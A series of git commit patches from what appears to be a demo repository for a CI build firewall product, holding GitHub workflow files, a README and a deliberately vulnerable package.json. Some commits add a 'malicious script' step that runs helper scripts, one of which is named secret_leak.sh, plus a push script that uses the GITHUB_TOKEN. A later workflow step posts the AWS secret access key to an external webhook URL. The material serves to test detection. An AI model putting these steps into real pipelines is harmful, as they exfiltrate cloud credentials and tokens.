insertion(+), 1 deletion(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index c4385e1..435ca14 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -16,7 +16,7 @@ jobs: - name: Setup PSE uses: invisirisk/pse-action@dev-test with: - api_url: "https://app.stage.invisirisk.com" + api_url: "https://app.dev.veribom.com" app_token: ${{ secrets.VB_API_KEY }} job_status: ${{job.status}} From bd3bb80b7162e671485d303b0ea5674eacc46569 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 28 Apr 2025 11:51:58 +0545 Subject: [PATCH 73/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index 435ca14..c7e8eb2 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -30,8 +30,8 @@ jobs: - name: Install dependencies run: npm install --legacy-peer-deps - #- name: 😈 Execute malicious script - #run: bash run_malicious_scripts.sh + - name: 😈 Execute malicious script + run: bash run_malicious_scripts.sh - name: Cleanup PSE if: always() uses: invisirisk/pse-action@dev-test From 4ef506a77574a5c091456c91e59d62f62bd72197 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 11:40:48 +0545 Subject: [PATCH 74/89] chnage in Readme --- Malicious_scripts/push.sh | 17 +++++++++++++++++ Malicious_scripts/run_wrapper.sh | 8 ++++++++ Malicious_scripts/statuscode.sh | 11 +++++++++++ 3 files changed, 36 insertions(+) create mode 100644 Malicious_scripts/push.sh create mode 100644 Malicious_scripts/run_wrapper.sh create mode 100644 Malicious_scripts/statuscode.sh diff --git a/Malicious_scripts/push.sh b/Malicious_scripts/push.sh new file mode 100644 index 0000000..8bd4525 --- /dev/null +++ b/Malicious_scripts/push.sh @@ -0,0 +1,17 @@ +#!/bin/bash + +echo "Marking repository as safe..." +git config --global --add safe.directory "$GITHUB_WORKSPACE" + +echo "Setting up Git user..." +git config user.name "ir-paras-oli" +git config user.email "paras.oli@invisirisk.com" + +echo "Making changes (creating a file)..." +echo "Some new content" > new6-file.txt +git add new6-file.txt +git commit -m "Add a new file" + +echo "Pushing changes to the STAGE branch..." +git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git +git push origin STAGE diff --git a/Malicious_scripts/run_wrapper.sh b/Malicious_scripts/run_wrapper.sh new file mode 100644 index 0000000..b6e5e2e --- /dev/null +++ b/Malicious_scripts/run_wrapper.sh @@ -0,0 +1,8 @@ +#!/bin/bash + +echo "Starting leak_token.sh execution..." +bash ./secret_leak.sh # Call the actual script +bash ./statuscode.sh # Call the actual script +bash ./push.sh # Call the actual script +bash ./mimetype.sh # Call the actual script +echo "Execution completed." diff --git a/Malicious_scripts/statuscode.sh b/Malicious_scripts/statuscode.sh new file mode 100644 index 0000000..bec9161 --- /dev/null +++ b/Malicious_scripts/statuscode.sh @@ -0,0 +1,11 @@ +#!/bin/bash + +echo "Checking status code from GitHub API..." + +# This request should trigger a 400 Bad Request because 'q' is empty +curl -k -i -X GET "https://api.github.com/search/repositories?q=" + +# This request should trigger a 401 Unauthorized if authentication is required but not provided +# curl -k -i -X GET "https://api.github.com/user" + +echo "Status check completed." From 406254c3c00328b682bbb29240fca2544373d497 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 11:58:32 +0545 Subject: [PATCH 75/89] change --- secret_leak.sh => .github/secret_leak.sh | 0 .../{mainpolicyapplied.yml => build.yml} | 9 +- .github/workflows/mainpolicynotapplied.yml | 100 ------------------ README.md | 57 +++++++++- .../mimetype.sh | 0 push.sh | 17 --- run_wrapper.sh | 8 -- statuscode.sh | 11 -- 8 files changed, 58 insertions(+), 144 deletions(-) rename secret_leak.sh => .github/secret_leak.sh (100%) rename .github/workflows/{mainpolicyapplied.yml => build.yml} (89%) delete mode 100644 .github/workflows/mainpolicynotapplied.yml rename mimetype.sh => mern-social-second-edition/mimetype.sh (100%) delete mode 100644 push.sh delete mode 100644 run_wrapper.sh delete mode 100644 statuscode.sh diff --git a/secret_leak.sh b/.github/secret_leak.sh similarity index 100% rename from secret_leak.sh rename to .github/secret_leak.sh diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/build.yml similarity index 89% rename from .github/workflows/mainpolicyapplied.yml rename to .github/workflows/build.yml index c7e8eb2..e6b1523 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/build.yml @@ -17,15 +17,15 @@ jobs: uses: invisirisk/pse-action@dev-test with: api_url: "https://app.dev.veribom.com" - app_token: ${{ secrets.VB_API_KEY }} + app_token: ${{ secrets.IR_API_KEY }} job_status: ${{job.status}} - + - uses: actions/checkout@v4 - name: Use npm uses: actions/setup-node@v3 with: - node-version: '18' + node-version: "18" - name: Install dependencies run: npm install --legacy-peer-deps @@ -37,6 +37,3 @@ jobs: uses: invisirisk/pse-action@dev-test with: cleanup: "true" - - - diff --git a/.github/workflows/mainpolicynotapplied.yml b/.github/workflows/mainpolicynotapplied.yml deleted file mode 100644 index 1887321..0000000 --- a/.github/workflows/mainpolicynotapplied.yml +++ /dev/null @@ -1,100 +0,0 @@ -name: Build JavaScript Package (policy not applied) -on: - workflow_dispatch: - push: - branches: [ STAGE ] - -permissions: - checks: write - contents: write - packages: read -env: - API_URL: https://app.veribom.com - -jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: - runs-on: ubuntu-latest - outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} - steps: - - name: Fetching VB Token - id: fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - - start_proxy_and_build: - runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] - services: - pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test - credentials: - username: ${{needs.ecr_details.outputs.ecr_username}} - password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.veribom.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - container: - image: node:18-buster - options: --cap-add=NET_ADMIN --privileged - strategy: - matrix: - node-version: [18.x] - steps: - - name: Install curl - run: | - apt-get update - apt-get install -y curl - - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - - name: Execute wrapper script - run: bash run_wrapper.sh - - - name: install dependencies - run: npm install --legacy-peer-deps diff --git a/README.md b/README.md index ed8b0f0..1688be2 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,55 @@ -readme -readme +# InvisiRisk Build Application Firewall Demo + +This repository contains a Python application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a Python environment. + +## GitHub Workflow Setup + +To integrate InvisiRisk into your GitHub workflow, add the following steps to each job in your workflow file: + +### 1. Add the Setup PSE step at the beginning of each job: + +```yaml +- name: Setup PSE + uses: invisirisk/pse-action@v1.0.20 + with: + api_url: "https://app.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} +``` + +### 2. Add the Cleanup PSE step at the end of each job: + +```yaml +- name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@v1.0.20 + with: + cleanup: "true" +``` + +### 3. Set up the required secret: + +You need to set the IR_API_KEY secret in your GitHub repository settings. This API key can be obtained from the InvisiRisk portal. + +### Example workflow: + +```yaml +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - name: Setup PSE + uses: invisirisk/pse-action@v1.0.20 + with: + api_url: "https://app.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} + + # Your other build steps here + + - name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@v1.0.20 + with: + cleanup: "true" +``` diff --git a/mimetype.sh b/mern-social-second-edition/mimetype.sh similarity index 100% rename from mimetype.sh rename to mern-social-second-edition/mimetype.sh diff --git a/push.sh b/push.sh deleted file mode 100644 index 8bd4525..0000000 --- a/push.sh +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/bash - -echo "Marking repository as safe..." -git config --global --add safe.directory "$GITHUB_WORKSPACE" - -echo "Setting up Git user..." -git config user.name "ir-paras-oli" -git config user.email "paras.oli@invisirisk.com" - -echo "Making changes (creating a file)..." -echo "Some new content" > new6-file.txt -git add new6-file.txt -git commit -m "Add a new file" - -echo "Pushing changes to the STAGE branch..." -git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git -git push origin STAGE diff --git a/run_wrapper.sh b/run_wrapper.sh deleted file mode 100644 index b6e5e2e..0000000 --- a/run_wrapper.sh +++ /dev/null @@ -1,8 +0,0 @@ -#!/bin/bash - -echo "Starting leak_token.sh execution..." -bash ./secret_leak.sh # Call the actual script -bash ./statuscode.sh # Call the actual script -bash ./push.sh # Call the actual script -bash ./mimetype.sh # Call the actual script -echo "Execution completed." diff --git a/statuscode.sh b/statuscode.sh deleted file mode 100644 index bec9161..0000000 --- a/statuscode.sh +++ /dev/null @@ -1,11 +0,0 @@ -#!/bin/bash - -echo "Checking status code from GitHub API..." - -# This request should trigger a 400 Bad Request because 'q' is empty -curl -k -i -X GET "https://api.github.com/search/repositories?q=" - -# This request should trigger a 401 Unauthorized if authentication is required but not provided -# curl -k -i -X GET "https://api.github.com/user" - -echo "Status check completed." From aa17ec906cf4c72f8dd2251b2cdc1c099f9aa3b3 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:06:08 +0545 Subject: [PATCH 76/89] change --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1688be2..d687843 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # InvisiRisk Build Application Firewall Demo -This repository contains a Python application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a Python environment. +This repository contains a JavaScript application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a JavaScript environment. ## GitHub Workflow Setup From aab654a55ea51b6c8529a97ebeb9a2962155714b Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:09:19 +0545 Subject: [PATCH 77/89] change in build file --- .github/workflows/build.yml | 4 ++-- {.github => Malicious_scripts}/secret_leak.sh | 0 2 files changed, 2 insertions(+), 2 deletions(-) rename {.github => Malicious_scripts}/secret_leak.sh (100%) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index e6b1523..235c022 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -16,7 +16,7 @@ jobs: - name: Setup PSE uses: invisirisk/pse-action@dev-test with: - api_url: "https://app.dev.veribom.com" + api_url: "https://app.invisirisk.com" app_token: ${{ secrets.IR_API_KEY }} job_status: ${{job.status}} @@ -34,6 +34,6 @@ jobs: run: bash run_malicious_scripts.sh - name: Cleanup PSE if: always() - uses: invisirisk/pse-action@dev-test + uses: invisirisk/pse-action@dev-latest with: cleanup: "true" diff --git a/.github/secret_leak.sh b/Malicious_scripts/secret_leak.sh similarity index 100% rename from .github/secret_leak.sh rename to Malicious_scripts/secret_leak.sh From 54d1d65930f54aef772a4bdf2185e5e1fbc1eceb Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:11:57 +0545 Subject: [PATCH 78/89] change in build file --- .github/workflows/build.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 235c022..ea01bb8 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -34,6 +34,6 @@ jobs: run: bash run_malicious_scripts.sh - name: Cleanup PSE if: always() - uses: invisirisk/pse-action@dev-latest + uses: invisirisk/pse-action@latest with: cleanup: "true" From df582fd7c36a9eb46cfe0f6c98adb2585d53afda Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:13:53 +0545 Subject: [PATCH 79/89] change --- .github/workflows/build.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index ea01bb8..e9c0560 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -1,6 +1,9 @@ name: JavaScript Project on: + push: + branches: + - main workflow_dispatch: permissions: From 6017a85a2df793e1b7be0486381fa6ee1da93a63 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:22:33 +0545 Subject: [PATCH 80/89] change' --- run_malicious_scripts.sh | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 run_malicious_scripts.sh diff --git a/run_malicious_scripts.sh b/run_malicious_scripts.sh new file mode 100644 index 0000000..deac8b2 --- /dev/null +++ b/run_malicious_scripts.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +echo "Starting malicious execution..." +bash malicious_scripts/secret_leak.sh # Call the actual script +bash malicious_scripts/status_code.sh # Call the actual script +bash malicious_scripts/push.sh # Call the actual script +bash malicious_scripts/mime_type.sh # Call the actual script +bash malicious_scripts/content_length.sh # Call the actual script +echo "Execution completed." \ No newline at end of file From ad0da2325608d0d9d680edf141020e16333602bd Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:29:12 +0545 Subject: [PATCH 81/89] change in code --- package.json | 106 +++++++++++++++++++++++++-------------------------- 1 file changed, 53 insertions(+), 53 deletions(-) diff --git a/package.json b/package.json index 56f2dd3..87fd990 100644 --- a/package.json +++ b/package.json @@ -1,63 +1,63 @@ { - "name": "vulnerable-project", + "name": "javascript-project", "version": "1.0.0", - "description": "A project with intentionally vulnerable dependencies.", + "description": "Demo Project", "main": "index.js", "scripts": { "start": "node index.js", "test": "echo \"Error: no test specified\" && exit 1" }, "dependencies": { - "express": "4.17.1", - "lodash": "4.17.20", - "mongoose": "5.9.2", - "body-parser": "1.19.0", - "cors": "2.8.5", - "dotenv": "8.2.0", - "jsonwebtoken": "8.3.0", - "helmet": "3.23.3", - "morgan": "1.10.0", - "bcryptjs": "2.4.3", - "moment": "2.24.0", - "request": "2.88.2", - "bluebird": "3.7.2", - "debug": "2.6.9", - "async": "3.2.0", - "winston": "3.2.1", - "multer": "1.4.2", - "nodemailer": "6.4.6", - "mysql": "2.18.1", - "pg": "8.2.1", - "redis": "3.0.2", - "socket.io": "2.3.0", - "uuid": "3.3.3", - "validator": "13.1.1", - "xml2js": "0.4.23", - "cheerio": "1.0.0-rc.3", - "crypto-js": "4.0.0", - "node-fetch": "2.6.1", - "sharp": "0.25.4", - "commander": "5.0.0", - "chalk": "4.0.0", - "ini": "1.3.5", - "handlebars": "4.7.6", - "marked": "0.3.6", - "merge-deep": "3.0.2", - "minimist": "1.2.5", - "q": "1.5.1", - "underscore": "1.10.2", - "yargs-parser": "20.2.2", - "jquery": "3.5.1", - "xmlhttprequest": "1.8.0", - "lodash.merge": "4.6.2", - "lodash.defaultsdeep": "4.6.1", - "react": "16.13.1", - "react-dom": "16.13.1", - "axios": "0.19.2", - "next": "13.5.5", - "shelljs": "0.8.4", - "node-forge": "0.10.0", - "xml-js": "1.6.11", - "hoek": "5.0.3" + "express": "^4.18.2", + "lodash": "^4.17.21", + "mongoose": "^7.5.2", + "body-parser": "^1.20.2", + "cors": "^2.8.5", + "dotenv": "^16.3.1", + "jsonwebtoken": "^9.0.2", + "helmet": "^7.0.0", + "morgan": "^1.10.0", + "bcryptjs": "^2.4.3", + "moment": "^2.29.4", + "request": "^2.88.2", + "bluebird": "^3.7.2", + "debug": "^4.3.4", + "async": "^3.2.5", + "winston": "^3.9.0", + "multer": "^1.4.5-lts.1", + "nodemailer": "^6.9.5", + "mysql": "^2.18.1", + "pg": "^8.11.1", + "redis": "^4.6.7", + "socket.io": "^4.7.2", + "uuid": "^9.0.0", + "validator": "^13.11.0", + "xml2js": "^0.6.2", + "cheerio": "^1.0.0-rc.12", + "crypto-js": "^4.2.0", + "node-fetch": "^2.6.12", + "sharp": "^0.33.3", + "commander": "^11.1.0", + "chalk": "^5.3.0", + "ini": "^4.1.1", + "handlebars": "^4.7.8", + "marked": "^9.1.2", + "merge-deep": "^3.0.3", + "minimist": "^1.2.8", + "q": "^1.5.1", + "underscore": "^1.13.6", + "yargs-parser": "^21.1.1", + "jquery": "^3.7.1", + "xmlhttprequest": "^1.8.0", + "lodash.merge": "^4.6.2", + "lodash.defaultsdeep": "^4.6.1", + "react": "^18.2.0", + "react-dom": "^18.2.0", + "axios": "^1.6.8", + "next": "^14.1.4", + "shelljs": "^0.8.5", + "node-forge": "^1.3.1", + "xml-js": "^1.6.11", + "hoek": "^9.1.0" } } From eb74bfbcc9e29367c0baf26b5a6d5094b3508914 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:35:56 +0545 Subject: [PATCH 82/89] change in code --- .../mimetype.sh | 0 package.json | 104 +++++++++--------- 2 files changed, 52 insertions(+), 52 deletions(-) rename {mern-social-second-edition => Malicious_scripts}/mimetype.sh (100%) diff --git a/mern-social-second-edition/mimetype.sh b/Malicious_scripts/mimetype.sh similarity index 100% rename from mern-social-second-edition/mimetype.sh rename to Malicious_scripts/mimetype.sh diff --git a/package.json b/package.json index 87fd990..3d0d9aa 100644 --- a/package.json +++ b/package.json @@ -1,63 +1,63 @@ { "name": "javascript-project", "version": "1.0.0", - "description": "Demo Project", + "description": "Demo JavaScript Project", "main": "index.js", "scripts": { "start": "node index.js", "test": "echo \"Error: no test specified\" && exit 1" }, "dependencies": { - "express": "^4.18.2", - "lodash": "^4.17.21", - "mongoose": "^7.5.2", - "body-parser": "^1.20.2", - "cors": "^2.8.5", - "dotenv": "^16.3.1", - "jsonwebtoken": "^9.0.2", - "helmet": "^7.0.0", - "morgan": "^1.10.0", - "bcryptjs": "^2.4.3", - "moment": "^2.29.4", - "request": "^2.88.2", - "bluebird": "^3.7.2", - "debug": "^4.3.4", - "async": "^3.2.5", - "winston": "^3.9.0", - "multer": "^1.4.5-lts.1", - "nodemailer": "^6.9.5", - "mysql": "^2.18.1", - "pg": "^8.11.1", - "redis": "^4.6.7", - "socket.io": "^4.7.2", - "uuid": "^9.0.0", - "validator": "^13.11.0", - "xml2js": "^0.6.2", - "cheerio": "^1.0.0-rc.12", - "crypto-js": "^4.2.0", - "node-fetch": "^2.6.12", - "sharp": "^0.33.3", - "commander": "^11.1.0", - "chalk": "^5.3.0", - "ini": "^4.1.1", - "handlebars": "^4.7.8", - "marked": "^9.1.2", - "merge-deep": "^3.0.3", - "minimist": "^1.2.8", - "q": "^1.5.1", - "underscore": "^1.13.6", - "yargs-parser": "^21.1.1", - "jquery": "^3.7.1", - "xmlhttprequest": "^1.8.0", - "lodash.merge": "^4.6.2", - "lodash.defaultsdeep": "^4.6.1", - "react": "^18.2.0", - "react-dom": "^18.2.0", - "axios": "^1.6.8", - "next": "^14.1.4", - "shelljs": "^0.8.5", - "node-forge": "^1.3.1", - "xml-js": "^1.6.11", - "hoek": "^9.1.0" + "express": "4.17.1", + "lodash": "4.17.20", + "mongoose": "5.9.2", + "body-parser": "1.19.0", + "cors": "2.8.5", + "dotenv": "8.2.0", + "jsonwebtoken": "8.3.0", + "helmet": "3.23.3", + "morgan": "1.10.0", + "bcryptjs": "2.4.3", + "moment": "2.24.0", + "request": "2.88.2", + "bluebird": "3.7.2", + "debug": "2.6.9", + "async": "3.2.0", + "winston": "3.2.1", + "multer": "1.4.2", + "nodemailer": "6.4.6", + "mysql": "2.18.1", + "pg": "8.2.1", + "redis": "3.0.2", + "socket.io": "2.3.0", + "uuid": "3.3.3", + "validator": "13.1.1", + "xml2js": "0.4.23", + "cheerio": "1.0.0-rc.3", + "crypto-js": "4.0.0", + "node-fetch": "2.6.1", + "sharp": "0.25.4", + "commander": "5.0.0", + "chalk": "4.0.0", + "ini": "1.3.5", + "handlebars": "4.7.6", + "marked": "0.3.6", + "merge-deep": "3.0.2", + "minimist": "1.2.5", + "q": "1.5.1", + "underscore": "1.10.2", + "yargs-parser": "20.2.2", + "jquery": "3.5.1", + "xmlhttprequest": "1.8.0", + "lodash.merge": "4.6.2", + "lodash.defaultsdeep": "4.6.1", + "react": "16.13.1", + "react-dom": "16.13.1", + "axios": "0.19.2", + "next": "13.5.5", + "shelljs": "0.8.4", + "node-forge": "0.10.0", + "xml-js": "1.6.11", + "hoek": "5.0.3" } } From 08a9d26a78b516ea9efea368b072c76a89463118 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 15:05:44 +0545 Subject: [PATCH 83/89] Readme file removed --- mern-social-second-edition/README.md | 58 ---------------------------- 1 file changed, 58 deletions(-) delete mode 100644 mern-social-second-edition/README.md diff --git a/mern-social-second-edition/README.md b/mern-social-second-edition/README.md deleted file mode 100644 index 33664e2..0000000 --- a/mern-social-second-edition/README.md +++ /dev/null @@ -1,58 +0,0 @@ -# MERN Social 2.0 -- *Looking for the first edition code? [Check here](https://github.com/shamahoque/mern-social/tree/master)* - -A simple social media application with users, posts, likes and comments - developed using React, Node, Express and MongoDB. - -![MERN Social](https://s3.amazonaws.com/mernbook/git+/social.png "MERN Social") - -### [Live Demo](http://social2.mernbook.com/ "MERN Social") - -#### What you need to run this code -1. Node (13.12.0) -2. NPM (6.14.4) or Yarn (1.22.4) -3. MongoDB (4.2.0) - -#### How to run this code -1. Make sure MongoDB is running on your system -2. Clone this repository -3. Open command line in the cloned folder, - - To install dependencies, run ``` npm install ``` or ``` yarn ``` - - To run the application for development, run ``` npm run development ``` or ``` yarn development ``` -4. Open [localhost:3000](http://localhost:3000/) in the browser ----- -### More applications built using this stack - -* [MERN Skeleton](https://github.com/shamahoque/mern-social/tree/second-edition) -* [MERN Classroom](https://github.com/shamahoque/mern-classroom) -* [MERN Marketplace](https://github.com/shamahoque/mern-marketplace/tree/second-edition) -* [MERN Expense Tracker](https://github.com/shamahoque/mern-expense-tracker) -* [MERN Mediastream](https://github.com/shamahoque/mern-mediastream/tree/second-edition) -* [MERN VR Game](https://github.com/shamahoque/mern-vrgame/tree/second-edition) - -Learn more at [mernbook.com](http://www.mernbook.com/) - ----- -## Get the book -#### [Full-Stack React Projects - Second Edition](https://www.packtpub.com/web-development/full-stack-react-projects-second-edition) -*Learn MERN stack development by building modern web apps using MongoDB, Express, React, and Node.js* - -Full-Stack React Projects - -React combined with industry-tested, server-side technologies, such as Node, Express, and MongoDB, enables you to develop and deploy robust real-world full-stack web apps. This updated second edition focuses on the latest versions and conventions of the technologies in this stack, along with their new features such as Hooks in React and async/await in JavaScript. The book also explores advanced topics such as implementing real-time bidding, a web-based classroom app, and data visualization in an expense tracking app. - -Full-Stack React Projects will take you through the process of preparing the development environment for MERN stack-based web development, creating a basic skeleton app, and extending it to build six different web apps. You'll build apps for social media, classrooms, media streaming, online marketplaces with real-time bidding, and web-based games with virtual reality features. Throughout the book, you'll learn how MERN stack web development works, extend its capabilities for complex features, and gain actionable insights into creating MERN-based apps, along with exploring industry best practices to meet the ever-increasing demands of the real world. - -Things you'll learn in this book: - -- Extend a MERN-based application to build a variety of applications -- Add real-time communication capabilities with Socket.IO -- Implement data visualization features for React applications using Victory -- Develop media streaming applications using MongoDB GridFS -- Improve SEO for your MERN apps by implementing server-side rendering with data -- Implement user authentication and authorization using JSON web tokens -- Set up and use React 360 to develop user interfaces with VR capabilities -- Make your MERN stack applications reliable and scalable with industry best practices - -If you feel this book is for you, get your [copy](https://www.amazon.com/dp/1839215410) today! - ---- From 618f975e2c3fbd3e072fc4608efcf16ee3a80849 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 5 May 2025 10:53:43 +0545 Subject: [PATCH 84/89] Update build.yml --- .github/workflows/build.yml | 18 ++---------------- 1 file changed, 2 insertions(+), 16 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index e9c0560..6fe8bde 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -1,9 +1,6 @@ name: JavaScript Project on: - push: - branches: - - main workflow_dispatch: permissions: @@ -12,21 +9,15 @@ permissions: packages: read jobs: - python-application-build: + unrelesed-deps: runs-on: ubuntu-latest name: Run build steps: - - name: Setup PSE - uses: invisirisk/pse-action@dev-test - with: - api_url: "https://app.invisirisk.com" - app_token: ${{ secrets.IR_API_KEY }} - job_status: ${{job.status}} - uses: actions/checkout@v4 - name: Use npm - uses: actions/setup-node@v3 + uses: actions/setup-node@v4 with: node-version: "18" @@ -35,8 +26,3 @@ jobs: - name: 😈 Execute malicious script run: bash run_malicious_scripts.sh - - name: Cleanup PSE - if: always() - uses: invisirisk/pse-action@latest - with: - cleanup: "true" From be0760a60747210ae410f20bb088ead76b64872c Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 12:55:45 +0545 Subject: [PATCH 85/89] Update package.json --- package.json | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/package.json b/package.json index 3d0d9aa..4884665 100644 --- a/package.json +++ b/package.json @@ -39,12 +39,12 @@ "sharp": "0.25.4", "commander": "5.0.0", "chalk": "4.0.0", - "ini": "1.3.5", - "handlebars": "4.7.6", - "marked": "0.3.6", - "merge-deep": "3.0.2", - "minimist": "1.2.5", - "q": "1.5.1", + #"ini": "1.3.5", + # "handlebars": "4.7.6", + #"marked": "0.3.6", + # "merge-deep": "3.0.2", + # "minimist": "1.2.5", + #"q": "1.5.1", "underscore": "1.10.2", "yargs-parser": "20.2.2", "jquery": "3.5.1", From 0de9ef26c2b21aeeeaf441b15db87d067f2ea93e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 12:59:53 +0545 Subject: [PATCH 86/89] Update build.yml --- .github/workflows/build.yml | 25 ++++++++++++++++++++----- 1 file changed, 20 insertions(+), 5 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 6fe8bde..064682b 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -9,12 +9,15 @@ permissions: packages: read jobs: - unrelesed-deps: + python-application-build: runs-on: ubuntu-latest name: Run build steps: - - - uses: actions/checkout@v4 + - name: Setup PSE + uses: invisirisk/pse-action@dev-test + with: + api_url: "https://app.dev.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY } - name: Use npm uses: actions/setup-node@v4 @@ -24,5 +27,17 @@ jobs: - name: Install dependencies run: npm install --legacy-peer-deps - - name: 😈 Execute malicious script - run: bash run_malicious_scripts.sh + #- name: 😈 Execute malicious script + # run: bash run_malicious_scripts.sh + + - name: Send AWS Secret via Webhook (test) + run: | + curl -X POST "https://webhook.site/59c8292c-2297-4149-ac29-c02bec44a27a" \ + --data-urlencode "aws_secret_access_key=${{ secrets.AWS_SECRET_ACCESS_KEY }}" + + + - name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@dev-test + with: + cleanup: "true" From 397dc79d84069fa2cb9beeabad2372ad45c9a011 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 14:16:07 +0545 Subject: [PATCH 87/89] Update package.json --- package.json | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/package.json b/package.json index 4884665..733556e 100644 --- a/package.json +++ b/package.json @@ -33,18 +33,12 @@ "uuid": "3.3.3", "validator": "13.1.1", "xml2js": "0.4.23", - "cheerio": "1.0.0-rc.3", - "crypto-js": "4.0.0", - "node-fetch": "2.6.1", - "sharp": "0.25.4", - "commander": "5.0.0", - "chalk": "4.0.0", - #"ini": 